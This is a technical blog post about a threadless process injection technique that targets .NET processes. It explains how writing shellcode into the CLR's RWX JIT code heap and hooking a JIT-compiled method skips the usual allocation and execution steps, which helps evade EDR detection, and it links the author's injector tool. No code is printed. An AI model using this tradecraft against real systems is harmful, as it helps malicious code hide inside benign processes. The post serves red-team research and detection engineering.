.NET Threadless Process Injection

Daniel Santos
7 min readFeb 18, 2024

Disclaimers

  • The technique described in this article is heavily based on Adam Chester's (@_xpn_) “Weird Ways to Run Unmanaged Code in .NET” article.
  • The article is divided into sections. If you are already familiar with the foundations of process injection and the Microsoft .NET CLR, you can skip the 101 sections.

Process Injection 101

Process injection is the set of techniques used to run arbitrary code in the context of a target live process. The target process must already exist when the injector process is run. Process injection is different than process spawning, where the injector process needs to create a new sacrificial process to perform the code injection.

But why do threat actors and Red Team operators rely on process injection? A few reasons come to mind: running your malicious code in the context of a target benign process provides stability, evasion, and covertness. If your code is unstable and may crash, it's better to kill a random running process than your main command and control agent (stability). Some exceptions may be in place where a few processes will be excluded from real-time security scanning. Therefore, using these as proxies will increase the chances of going undetected (evasion). Moreover, if your operation is ever manually reviewed by a forensic analyst, it’s better to have svchost.exe behaving oddly than YourNotoriouslyMaliciousProgram.exe (covertness).

Classic Process injection usually happens in three stages, allocation, writing/transfer, and execution. In the allocation phase, the injector process must create or find some space in the target’s memory space to store the code it intends to execute. The VirtualAllocEx and NtMapViewOfSection are examples of Windows API calls commonly used for allocation. Code caves are also used in the allocation phase. Code caves are memory regions allocated by the target process itself during its regular flow of execution. These are usually read/write/execute (RWX) memory regions that can be used by the injector to store arbitrary code. The caveat of using code caves is stability. The injector needs to understand how the target process uses these memory regions so it doesn’t just overwrite some critical structure that will cause the target process to crash unexpectedly. Therefore, injection techniques that rely on code caves are either destructive (sacrifice the target process) or target-specific.

The writing/transfer phase is where the injector will effectively write the code into the memory region mapped during the allocation stage. WriteProcessMemory is an example of a Windows API call commonly used for writing to a target’s memory.

The last stage of a classic process injection chain is execution. As the name implies, this is where the injected code is finally executed. The CreateRemoteThread and NtQueueApcThread are examples of Windows API calls commonly used for allocation.

The Safebreach Labs folks did an amazing job with their Process Injection Techniques — Gotta Catch Them All talk, properly defining process injection and going over the different available techniques.

Detection 101

Modern EDR tools use a combination of API hooks, Event Tracing for Windows (ETW), and kernel callbacks to detect malicious behavior.

API hooks are techniques where the normal flow of execution in a program is intercepted. EDR tools use API hooks to monitor and log calls to critical system APIs that malware often uses. For example, an EDR tool might hook functions related to process creation, file operations, and network connections.

ETW is a tracing facility provided by Windows that allows collecting and logging detailed event information from both user-mode applications and kernel-mode drivers. EDR tools use ETW to subscribe to event channels and capture telemetry about system behavior in real time. ETW can provide information about file system activity, process life cycle events, network traffic, etc.

Kernel callbacks are mechanisms that allow a kernel-mode component, like a driver, to be notified when certain system activities occur. EDR tools often include kernel components that register callbacks for various system activities, such as process/thread creation and termination, image (executable) loading, registry operations, etc.

Using the mechanisms described above, EDR tools detect process injection techniques by identifying their patterns. In a nutshell, every time a sequence of API calls that matches the allocate/write/execute pattern against a single target process is detected, the EDR will take action.

Modern process injection techniques focus on shortening the classic process injection chain by eliminating the need for at least one of its stages. Alon Leviev’s PoolParty and Ceri Coburn’s Threadless Process Injection are examples of process injection techniques that eliminate the need for an explicit execution call. By removing one of the three classic phases, these modern techniques force EDR tool designers to rely either on signature-specific detections or to increase their false positive rates by taking action based on signals weaker than a complete injection chain.

.NET CLR 101

The .NET Common Language Runtime (CLR), is the virtual machine responsible for loading and executing .NET binaries. The CLR provides a series of services to a running .NET program, like threads and memory management, security checks, garbage collection, and Just-in-Time (JIT) compilation. When a standard .NET executable is compiled and run, the first thing to get executed is a stub responsible for loading the CLR. The rest of the program’s code will be available as Microsoft Intermediate Language (MSIL) chunks. Those are compiled as needed by the CLR’s JIT compiler. When a method is first invoked, a stub routine is called to compile the method’s MSIL body into machine code. Once the method is compiled, the CLR replaces the stub with a jump to its native version. The next time the method is called, there is no need to compile it again.

Every object type is associated with a MethodTable structure. For each method in the method table, there is an associated slot with a method descriptor (MethodDesc). The MethodDesc slot contains the entry point of the method. The slot is either in the MethodTable or in MethodDesc itself. The location of the slot is determined by the mdcHasNonVtableSlot (0x8) bit on the MethodDesc classification flags

MethodDesc depiction

The CLR’s Code Manager is responsible for keeping track of JIT-compiled methods and where they are stored in memory. It does this through a set of specialized JIT managers (JitManager). Each JitManager handles methods of one given CodeType. It can map a method body to a MethodDesc. Currently, three classes implement the IJitManager interface:

  • EEJitManager for JIT-compiled code generated by clrjit.dll.
  • NativeImageJitManager for code pre-compiled with NGEN.
  • ReadyToRunJitManager for version resilient ReadyToRun code.

The remainder of this article focuses solely on the EEJitManager.

When an MSIL method is compiled, its native version is stored in a code heap (CodeHeap). A CodeHeap is an abstraction the JitManager uses to allocate the memory needed for storing a JIT-compiled method. The CodeHeap works together with the HeapList to manage a contiguous block of memory. The EEJitManager uses a LoaderCodeHeap as its code heap. The LoaderCodeHeap is mapped to an RWX memory region.

.NET CLR Threadless Injection

Threadless injection techniques remove the explicit execution step of the classic process injection chain. Therefore, they are harder to detect through generic behavior analysis engines. Code caves are RWX memory regions allocated by a live process during its normal execution flow. Code caves can be used to eliminate the need for an allocation step during process injection. However, code caves are expected to be used by the target process. Thus, injecting shellcode in a code cave will likely crash the target process or require specific knowledge about the target’s inner workings.

What if we there was a class of processes with consistent code caves that behave according to a known pattern? Moreover, what if there was a way to control the target’s flow by manipulating writable structures? This would result in a process injection technique that not only skips its allocation and execution steps but also doesn’t require any sort of memory protection changes.

.NET processes check all of these boxes. The JIT compiler has to allocate RWX memory regions (code heaps) to host its compiled methods. Moreover, the method tables and associated slots that point to methods in these code heaps are writable, as they have to be manipulated by the CLR during run time.

How can this .NET-specific process injection be accomplished then? Here is the strategy:

  • Find JIT-compiled methods and choose a target for hooking
  • Allocate the shellcode in the LoaderCodeHeap
  • Update the LoaderCodeHeap allocation pointer so the shellcode is not overwritten by future allocations
  • Hook the JIT compiled target method
  • Wait for the method to be executed
  • Restore the target method to its original state (unhook)

All of these steps can be performed using my https://github.com/bananabr/CLRInjector tool.

CLRInjector usage example
CLRInjector usage example

I never took the time to check how the tool does against EDR engines other than Microsoft Defender. Any feedback regarding this is much appreciated.

--

--